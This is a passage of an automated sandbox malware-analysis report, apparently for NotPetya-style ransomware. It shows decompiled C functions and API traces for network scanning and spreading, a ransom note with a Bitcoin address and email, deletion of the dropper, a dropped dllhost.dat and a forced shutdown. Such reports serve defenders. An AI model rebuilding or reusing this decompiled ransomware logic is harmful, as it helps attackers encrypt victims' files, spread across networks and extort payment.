    							WaitForSingleObject(_v56, 0xea60);
    							_t117 =  *0x11ff108; // 0x2e6710
    							E011E70FA(_t117);
    							TerminateThread(_v24, 0); // executed
    						}
    						CloseHandle(_v24);
    					}
    					_t109 = _v8;
    					_t78 = _v12;
    					if(_t109 == 0) {
    						L17:
    						E011E73AE(_v8,  &_v1684, _v12); // executed
    						DeleteFileW( &_v1684); // executed
    						goto L18;
    					} else {
    						do {
    							 *_t78 = 0;
    							_t78 = _t78 + 1;
    							_t109 = _t109 - 1;
    						} while (_t109 != 0);
    						goto L17;
    					}
    				}
    				return _t59;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,76E6DE72,?,011E7EB2), ref: 011E755C
    • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,76E6DE72,?,011E7EB2), ref: 011E7571
    • GetProcAddress.KERNEL32(00000000,?,76E6DE72,?,011E7EB2), ref: 011E7578
    • IsWow64Process.KERNELBASE(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E7587
    • FindResourceW.KERNEL32(00000001,0000000A), ref: 011E759B
    • HeapFree.KERNEL32(00000000,?,76E6DE72), ref: 011E7771
      • Part of subcall function 011E85D0: LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
      • Part of subcall function 011E85D0: LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
      • Part of subcall function 011E85D0: SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
      • Part of subcall function 011E85D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
      • Part of subcall function 011E85D0: HeapFree.KERNEL32(00000000), ref: 011E8668
    • GetTempPathW.KERNEL32(00000208,?), ref: 011E75CC
    • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E75EA
    • CoCreateGuid.OLE32(?), ref: 011E7608
    • StringFromCLSID.OLE32(?,?), ref: 011E7621
      • Part of subcall function 011E73AE: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 011E73C4
      • Part of subcall function 011E73AE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E73DE
      • Part of subcall function 011E73AE: CloseHandle.KERNEL32(00000000), ref: 011E73EF
    • wsprintfW.USER32 ref: 011E765E
    • CreateThread.KERNEL32(00000000,00000000,011E73FD,?,00000000,00000000), ref: 011E7675
    • memset.MSVCRT ref: 011E7698
    • wsprintfW.USER32 ref: 011E76C0
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E76E5
    • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 011E76F7
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • TerminateThread.KERNELBASE(?,00000000), ref: 011E770C
    • CloseHandle.KERNEL32(?), ref: 011E7715
    • DeleteFileW.KERNELBASE(?,?,?), ref: 011E7744
    • CoTaskMemFree.OLE32(?), ref: 011E774D
    • GetProcessHeap.KERNEL32(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E776A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 67%
    			E011E8E7F(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
    				int _v0;
    				int _v4;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				void* __esi;
    				void* _t69;
    				void* _t73;
    				void* _t75;
    				signed int _t77;
    				signed int _t80;
    				void _t81;
    				void* _t84;
    				void* _t93;
    				void* _t100;
    				struct _SECURITY_ATTRIBUTES* _t101;
    				signed int _t105;
    				signed int _t108;
    				signed int _t109;
    				void* _t110;
    				intOrPtr* _t112;
    				intOrPtr* _t113;
    				void* _t114;
    				intOrPtr* _t115;
    				void* _t117;
    				signed int _t122;
    				void* _t125;
    
    				E011EA4F0(0x3014);
    				_t101 = 0;
    				_a16 = 0;
    				memset( &_a20, 0, 0xffc);
    				_a4112 = 0;
    				memset( &_a4116, 0, 0x1ffc);
    				_t115 = __imp__GetAdaptersInfo;
    				_t125 = (_t122 & 0xfffffff8) + 0x18;
    				_a8 = 0;
    				_v4 = 0;
    				_v0 = 0;
    				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
    				if(_t69 != 0x6f) {
    					L23:
    					return 0;
    				}
    				_t112 = LocalAlloc(0x40, _v0);
    				_a4 = _t112;
    				if(_t112 == 0) {
    					goto L23;
    				}
    				_t73 =  *_t115(_t112,  &_v0); // executed
    				if(_t73 != 0) {
    					L22:
    					LocalFree(_v4);
    					goto L23;
    				}
    				while(_v20 < 0x400) {
    					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
    						_t28 = _t112 + 0x200; // 0x200
    						_t93 = E011E6916(_t28);
    						_v24 = _t93;
    						if(_t93 != _t101) {
    							E011E6FC7(_t93, 0, _a4);
    							HeapFree(GetProcessHeap(), _t101, _v24);
    						}
    					}
    					_t112 =  *_t112;
    					_v28 = _v28 + 1;
    					if(_t112 != _t101) {
    						continue;
    					}
    					break;
    				}
    				_t75 = E011E8243(_t103); // executed
    				if(_t75 != 0) {
    					E011E908A(_a4);
    				}
    				if(_v20 <= _t101) {
    					L20:
    					if(_v16 <= _t101) {
    						goto L22;
    					} else {
    						goto L21;
    					}
    					do {
    						L21:
    						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
    						_t101 =  &(_t101->nLength);
    					} while (_t101 < _v16);
    					goto L22;
    				} else {
    					_t113 = __imp__#14;
    					do {
    						_t77 = LocalAlloc(0x40, 0xc);
    						_t117 = _t77;
    						if(_t117 != _t101) {
    							__imp__#11("255.255.255.255");
    							_t108 = _v20;
    							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
    							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
    							if(_t105 != 0) {
    								_t80 = _t77 ^ _t109 | _t105;
    								_v16 = _t80;
    								if(_t80 != 0) {
    									_t81 =  *_t113(_t105);
    									 *_t117 = _t81;
    									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
    									 *((intOrPtr*)(_t117 + 8)) = _a4;
    									_t84 = CreateThread(_t101, _t101, E011E8E04, _t117, _t101, _t101); // executed
    									if(_t84 != _t101) {
    										 *(_t125 + 0x20 + _v32 * 4) = _t84;
    									}
    								}
    							}
    						}
    						_v16 = _v16 + 1;
    					} while (_v16 < _v20);
    					goto L20;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 011E8EA3
    • memset.MSVCRT ref: 011E8EC0
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 011E8EE0
    • LocalAlloc.KERNEL32(00000040,?), ref: 011E8EF1
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 011E8F0B
    • inet_addr.WS2_32(000001B0), ref: 011E8F30
    • inet_addr.WS2_32(000001C0), ref: 011E8F44
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 011E8F75
    • HeapFree.KERNEL32(00000000), ref: 011E8F7C
    • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 011E8FAD
    • HeapFree.KERNEL32(00000000), ref: 011E8FB4
      • Part of subcall function 011E8243: NetServerGetInfo.NETAPI32(00000000,00000065,?,73389263,?,?,011E8FCD), ref: 011E8254
      • Part of subcall function 011E8243: NetApiBufferFree.NETAPI32(?,?,?,011E8FCD), ref: 011E8277
    • CloseHandle.KERNEL32(?), ref: 011E9068
      • Part of subcall function 011E908A: GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73389263,00000000), ref: 011E90D1
      • Part of subcall function 011E908A: DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 011E90F3
      • Part of subcall function 011E908A: DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 011E911F
      • Part of subcall function 011E908A: DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 011E9158
      • Part of subcall function 011E908A: htonl.WS2_32(00000000), ref: 011E9187
      • Part of subcall function 011E908A: htonl.WS2_32(00000000), ref: 011E9195
      • Part of subcall function 011E908A: inet_ntoa.WS2_32(00000000), ref: 011E9198
      • Part of subcall function 011E908A: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 011E91B6
      • Part of subcall function 011E908A: HeapFree.KERNEL32(00000000), ref: 011E91BD
      • Part of subcall function 011E908A: DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 011E91D2
      • Part of subcall function 011E908A: DhcpRpcFreeMemory.DHCPSAPI(?), ref: 011E91EB
    • LocalAlloc.KERNEL32(00000040,0000000C), ref: 011E8FE9
    • inet_addr.WS2_32(255.255.255.255), ref: 011E8FFA
    • htonl.WS2_32(?), ref: 011E9021
    • htonl.WS2_32(?), ref: 011E9029
    • CreateThread.KERNEL32(00000000,00000000,011E8E04,00000000,00000000,00000000), ref: 011E903E
    • LocalFree.KERNEL32(?), ref: 011E9079
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E1D32(WCHAR* _a4) {
    				long _v8;
    				void* _v12;
    				short _v1572;
    				void* _t19;
    				void* _t21;
    				void* _t25;
    				void* _t27;
    				intOrPtr* _t38;
    				void* _t47;
    				void* _t49;
    				intOrPtr _t51;
    
    				_t19 = E011E1BA0(_a4); // executed
    				if(_t19 != 0) {
    					_t21 = E011E1C7F(_a4);
    					_v12 = _t21;
    					if(_t21 == 0) {
    						L11:
    						return _t21;
    					}
    					if(PathCombineW( &_v1572, _a4, L"README.TXT") == 0) {
    						L10:
    						_t21 = LocalFree(_a4[0xc]);
    						goto L11;
    					}
    					_t25 = E011E6973();
    					if(_t25 != 0) {
    						Sleep((_t25 - 1) * 0xea60); // executed
    					}
    					_t27 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
    					_t47 = _t27;
    					if(_t47 == 0xffffffff) {
    						L9:
    						goto L10;
    					} else {
    						_v8 = 0;
    						WriteFile(_t47, L"Ooops, your important files are encrypted.\r\n\r\nIf you see this text, then your files are no longer accessible, because\r\nthey have been encrypted. Perhaps you are busy looking for a way to recover\r\nyour files, but don\'t waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\nWe guarantee that you can recover all your files safely and easily.\r\nAll you need to do is submit the payment and purchase the decryption key.\r\n\r\nPlease follow the instructions:\r\n\r\n1.\tSend $300 worth of Bitcoin to following address:\r\n\r\n", 0x432,  &_v8, 0); // executed
    						WriteFile(_t47, L"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\r\n\r\n", 0x4c,  &_v8, 0); // executed
    						WriteFile(_t47, L"2.\tSend your Bitcoin wallet ID and personal installation key to e-mail ", 0x8e,  &_v8, 0); // executed
    						WriteFile(_t47, L"wowsmith123456@posteo.net.\r\n", 0x38,  &_v8, 0); // executed
    						WriteFile(_t47, L"\tYour personal installation key:\r\n\r\n", 0x48,  &_v8, 0); // executed
    						_t38 = _v12;
    						_t49 = _t38 + 2;
    						do {
    							_t51 =  *_t38;
    							_t38 = _t38 + 2;
    						} while (_t51 != 0);
    						WriteFile(_t47, _v12, (_t38 - _t49 >> 1) + (_t38 - _t49 >> 1),  &_v8, 0); // executed
    						CloseHandle(_t47);
    						goto L9;
    					}
    				}
    				return _t19;
    			}

    APIs
      • Part of subcall function 011E1BA0: CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000,F0000000,?,?,?,?,011E1D43,?), ref: 011E1BC6
      • Part of subcall function 011E1BA0: LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,011E1D43,?), ref: 011E1BD6
      • Part of subcall function 011E1BA0: CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000,?,?,?,011E1D43,?), ref: 011E1BF8
      • Part of subcall function 011E1BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C1A
      • Part of subcall function 011E1BA0: LocalAlloc.KERNEL32(00000040,011E1D43,?,?,?,011E1D43,?), ref: 011E1C25
      • Part of subcall function 011E1BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C42
      • Part of subcall function 011E1BA0: CryptImportKey.ADVAPI32(5708458B,?,011E1D43,00000000,00000000,011E1D4F,?,?,?,011E1D43,?), ref: 011E1C5A
      • Part of subcall function 011E1BA0: LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C66
      • Part of subcall function 011E1BA0: LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C6F
      • Part of subcall function 011E1C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,011E1D54,F0000000,?), ref: 011E1CA6
      • Part of subcall function 011E1C7F: LocalAlloc.KERNEL32(00000040,?,?,011E1D54,F0000000,?), ref: 011E1CB1
      • Part of subcall function 011E1C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,011E1D54,F0000000,?), ref: 011E1CCC
      • Part of subcall function 011E1C7F: CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1CE8
      • Part of subcall function 011E1C7F: LocalAlloc.KERNEL32(00000040,F0000000,?,011E1D54,F0000000,?), ref: 011E1CF6
      • Part of subcall function 011E1C7F: CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1D0F
      • Part of subcall function 011E1C7F: LocalFree.KERNEL32(00000000,?,011E1D54,F0000000,?), ref: 011E1D1B
      • Part of subcall function 011E1C7F: LocalFree.KERNEL32(011E1D54,?,011E1D54,F0000000,?), ref: 011E1D24
    • PathCombineW.SHLWAPI(?,?,README.TXT), ref: 011E1D70
    • LocalFree.KERNEL32(?), ref: 011E1E46
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • Sleep.KERNELBASE(-00000001), ref: 011E1D8F
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E1DA8
    • WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000), ref: 011E1DD3
    • WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 011E1DE2
    • WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 011E1DF4
    • WriteFile.KERNEL32(00000000,wowsmith123456@posteo.net.,00000038,?,00000000), ref: 011E1E03
    • WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 011E1E12
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E1E35
    • CloseHandle.KERNEL32(00000000), ref: 011E1E38
    Strings
    • Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b, xrefs: 011E1DCA
    • wowsmith123456@posteo.net., xrefs: 011E1DFD
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1D95
    • 2.Send your Bitcoin wallet ID and personal installation key to e-mail , xrefs: 011E1DEE
    • Your personal installation key:, xrefs: 011E1E0C
    • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 011E1DDC
    • README.TXT, xrefs: 011E1D61
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E94A5(signed int _a4, long _a8, intOrPtr _a12, void* _a16) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				int _t16;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				int _t19;
    				void* _t22;
    				void* _t24;
    
    				_t16 = FreeLibrary( *0x11ff120); // executed
    				 *0x11ff114 = _t16;
    				if(_t16 == 0) {
    					return _t16;
    				}
    				_t17 =  *0x11ff13c; // 0x11e0000
    				 *0x11ff120 = _t17; // executed
    				_t18 = CreateFileW(0x11ff148, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v12 = _t18;
    				if(_t18 != 0) {
    					_v8 = GetFileSize(_t18, 0);
    					CloseHandle(_v12);
    					_t22 = CreateFileW(0x11ff148, 0x40000000, 0, 0, 2, 0, 0); // executed
    					_v12 = _t22;
    					if(_t22 != 0) {
    						_t24 = HeapAlloc(GetProcessHeap(), 8, _v8); // executed
    						_v16 = _t24;
    						if(_t24 != 0) {
    							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
    							HeapFree(GetProcessHeap(), 0, _v16);
    						}
    						CloseHandle(_v12);
    					}
    				}
    				_t19 = DeleteFileW(0x11ff148); // executed
    				 *0x11ff10c = _t19; // executed
    				_t16 = E011E9367(); // executed
    				if(_t16 != 0) {
    					E011E7DEB(_a4, _a8, _a12, _a16); // executed
    				}
    				ExitProcess(0);
    			}

    APIs
    • FreeLibrary.KERNELBASE ref: 011E94B2
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E94E9
    • GetFileSize.KERNEL32(00000000,00000000), ref: 011E94F4
    • CloseHandle.KERNEL32(?), ref: 011E9500
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E9512
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E9526
    • RtlAllocateHeap.NTDLL(00000000), ref: 011E9529
    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 011E9542
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E954C
    • HeapFree.KERNEL32(00000000), ref: 011E954F
    • CloseHandle.KERNEL32(?), ref: 011E9558
    • DeleteFileW.KERNELBASE(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E955F
      • Part of subcall function 011E9367: VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 011E93E1
      • Part of subcall function 011E9367: LoadLibraryA.KERNEL32(?), ref: 011E940B
      • Part of subcall function 011E9367: GetProcAddress.KERNEL32(00000000,011E0000), ref: 011E944E
      • Part of subcall function 011E9367: VirtualProtect.KERNELBASE(?,?,?,?), ref: 011E948E
    • ExitProcess.KERNEL32 ref: 011E9585
      • Part of subcall function 011E7DEB: WSAStartup.WS2_32(00000202,011FF768), ref: 011E7E1E
      • Part of subcall function 011E7DEB: InitializeCriticalSection.KERNEL32(011FF124,00000008,011E6C74,011E6CAA,000000FF,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7E63
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E7C10,00000000,00000000,00000000), ref: 011E7E99
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E9F8E,00000000,00000004,00000000), ref: 011E7F2B
      • Part of subcall function 011E7DEB: SetThreadToken.ADVAPI32(?,?), ref: 011E7F3B
      • Part of subcall function 011E7DEB: ResumeThread.KERNEL32(?), ref: 011E7F48
      • Part of subcall function 011E7DEB: GetLastError.KERNEL32 ref: 011E7F55
      • Part of subcall function 011E7DEB: CloseHandle.KERNEL32(?), ref: 011E7F61
      • Part of subcall function 011E7DEB: SetLastError.KERNEL32(00000057), ref: 011E7F73
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011E7D58,?,00000004,00000000), ref: 011E7F8F
      • Part of subcall function 011E7DEB: SetThreadToken.ADVAPI32(000000FF,00000057), ref: 011E7F9F
      • Part of subcall function 011E7DEB: ResumeThread.KERNEL32(000000FF), ref: 011E7FAC
      • Part of subcall function 011E7DEB: WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 011E7FBC
      • Part of subcall function 011E7DEB: GetLastError.KERNEL32 ref: 011E7FC4
      • Part of subcall function 011E7DEB: CloseHandle.KERNEL32(000000FF), ref: 011E7FCD
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011EA0FE,00000000,00000000,00000000), ref: 011E8006
      • Part of subcall function 011E7DEB: GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 011E8033
      • Part of subcall function 011E7DEB: HeapAlloc.KERNEL32(00000000), ref: 011E8036
      • Part of subcall function 011E7DEB: CreateThread.KERNEL32(00000000,00000000,011EA274,00000000,00000000,00000000), ref: 011E8058
      • Part of subcall function 011E7DEB: GetProcessHeap.KERNEL32(00000000,?), ref: 011E8062
      • Part of subcall function 011E7DEB: HeapFree.KERNEL32(00000000), ref: 011E8065
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(000000FF), ref: 011E807B
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(?), ref: 011E8095
      • Part of subcall function 011E7DEB: memset.MSVCRT ref: 011E80AE
      • Part of subcall function 011E7DEB: GetVersionExW.KERNEL32(?), ref: 011E80C3
      • Part of subcall function 011E7DEB: ExitProcess.KERNEL32 ref: 011E8115
      • Part of subcall function 011E7DEB: Sleep.KERNELBASE(?), ref: 011E8125
      • Part of subcall function 011E7DEB: wsprintfW.USER32 ref: 011E813B
      • Part of subcall function 011E7DEB: GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 011E8168
      • Part of subcall function 011E7DEB: GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 011E8178
      • Part of subcall function 011E7DEB: NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 011E8190
      • Part of subcall function 011E7DEB: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 011E819E
      • Part of subcall function 011E7DEB: ExitWindowsEx.USER32(00000006,00000000), ref: 011E81AF
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 79%
    			E011E8999(void* __ecx, intOrPtr _a4) {
    				void* _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				void* __ebx;
    				void* _t21;
    				WCHAR* _t24;
    				WCHAR* _t28;
    				char* _t29;
    				void* _t32;
    				long _t33;
    				WCHAR* _t34;
    				int _t36;
    				void* _t43;
    				intOrPtr _t44;
    				short _t45;
    				short* _t46;
    
    				_t43 = __ecx;
    				_v16 = 0;
    				_v20 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				if(FindResourceW( *0x11ff120, 3, 0xa) == 0) {
    					_t21 = 0;
    				} else {
    					_t21 = E011E85D0( &_v8, _t43,  &_v12, _t20); // executed
    				}
    				if(_t21 != 0) {
    					_t24 = HeapAlloc(GetProcessHeap(), 8, 0x208);
    					 *0x11ff100 = _t24;
    					if(_a4 == 0) {
    						__imp__SHGetFolderPathW(0, 0x23, 0, 0, _t24);
    						if(0 != 0) {
    							goto L13;
    						} else {
    							_t34 =  *0x11ff100; // 0x1442a10
    							_t8 =  &(_t34[1]); // 0x1442a12
    							_t46 = _t8;
    							do {
    								_t45 =  *_t34;
    								_t34 =  &(_t34[1]);
    							} while (_t45 != 0);
    							_t36 = _t34 - _t46 >> 1;
    							goto L10;
    						}
    					} else {
    						_t36 = GetWindowsDirectoryW(_t24, 0x104);
    						L10:
    						if(_t36 == 0 || _t36 + 0xc >= 0x104) {
    							L13:
    							HeapFree(GetProcessHeap(), 0,  *0x11ff100);
    							 *0x11ff100 =  *0x11ff100 & 0x00000000;
    						} else {
    							PathAppendW( *0x11ff100, L"dllhost.dat");
    						}
    					}
    					_t28 =  *0x11ff100; // 0x1442a10
    					if(_t28 != 0) {
    						_t32 = E011E8946(_v12, _t28, _v8, 0); // executed
    						if(_t32 != 0) {
    							L18:
    							_v20 = 1;
    						} else {
    							_t33 = GetLastError();
    							_v16 = _t33;
    							if(_t33 == 0x50) {
    								_v16 = _v16 & 0x00000000;
    								goto L18;
    							}
    						}
    					}
    					_t44 = _v12;
    					_t29 = _v8;
    					if(_t44 != 0) {
    						do {
    							 *_t29 = 0;
    							_t29 = _t29 + 1;
    							_t44 = _t44 - 1;
    						} while (_t44 != 0);
    					}
    					HeapFree(GetProcessHeap(), 0, _v8);
    				}
    				SetLastError(_v16);
    				return _v20;
    			}

    APIs
    • FindResourceW.KERNEL32(00000003,0000000A,00000000), ref: 011E89B9
    • GetProcessHeap.KERNEL32(00000008,00000208,002E6710), ref: 011E89EA
    • HeapAlloc.KERNEL32(00000000), ref: 011E89ED
    • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 011E8A0A
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 011E8A1A
    • PathAppendW.SHLWAPI(dllhost.dat), ref: 011E8A51
    • GetProcessHeap.KERNEL32(00000000), ref: 011E8A61
    • HeapFree.KERNEL32(00000000), ref: 011E8A64
    • HeapFree.KERNEL32(00000000), ref: 011E8ABA
      • Part of subcall function 011E8946: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
      • Part of subcall function 011E8946: WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
      • Part of subcall function 011E8946: CloseHandle.KERNEL32(00000000), ref: 011E898B
    • GetLastError.KERNEL32(01442A10,?,00000000), ref: 011E8A88
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E8AB7
    • SetLastError.KERNEL32(?), ref: 011E8AC0
      • Part of subcall function 011E85D0: LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
      • Part of subcall function 011E85D0: LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
      • Part of subcall function 011E85D0: SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
      • Part of subcall function 011E85D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
